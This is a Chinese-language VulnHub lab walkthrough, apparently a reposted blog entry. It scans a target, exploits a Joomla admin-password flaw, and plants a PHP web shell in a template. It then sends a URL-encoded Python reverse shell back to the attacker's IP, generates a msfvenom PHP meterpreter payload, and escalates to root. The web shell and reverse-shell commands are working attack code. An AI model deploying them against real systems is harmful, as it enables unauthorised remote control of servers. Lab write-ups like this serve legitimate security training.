前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >带妹玩转vulnhub(十)

带妹玩转vulnhub(十)

作者头像
用户5878089
发布2019-07-25 16:16:49
3230
发布2019-07-25 16:16:49
举报

前言

国庆第三天!接下来会写的比较的粗略。生活越来越无助,哪位师傅能施舍点活

开始

主机发现

netdiscover -r 192.168.43.0/24

端口扫描

nmap -A -p- -T4 192.168.43.7

渗透测试

从端口中可以看到很多信息,目标服务器开起来三个web服务,我们优先查看泄露信息最多的那个也就是8081端口,这是一个Joomlal开源框架,我们可以使用Joomscan工具进行漏洞扫描

可以看到存在许多的漏洞,我们需要关注的是admin密码修改的漏洞,查看对用的exp进行复现。

也比较简单,然后我们使用admin用户进行一个登录,在模版管理界面,发现这是一个php页面,所以我们可以修改模板,写入一个php的shell,从而获取webshell。

起初我是写入一个

<?phpif(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die;}?>

然后通过访问

192.168.43.7:8081/templates/beez/index.php?cmd=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22192.168.43.154%22%2C2333))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27

从而可以获取到webshell

不过后来我发现可以使用msfvenom生成一个php的webshell,命令如下

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.43.154 lport=4444 -f raw

设置如下的payload

可以成功的拿到webshell,接下来就需要进行一个提权,还是老套路,查看版本信息,然后选取可能的漏洞进行尝试。最终我们拿到了root

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2018-10-12,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 无级安全 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
命令行工具
腾讯云命令行工具 TCCLI 是管理腾讯云资源的统一工具。使用腾讯云命令行工具,您可以快速调用腾讯云 API 来管理您的腾讯云资源。此外,您还可以基于腾讯云的命令行工具来做自动化和脚本处理,以更多样的方式进行组合和重用。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档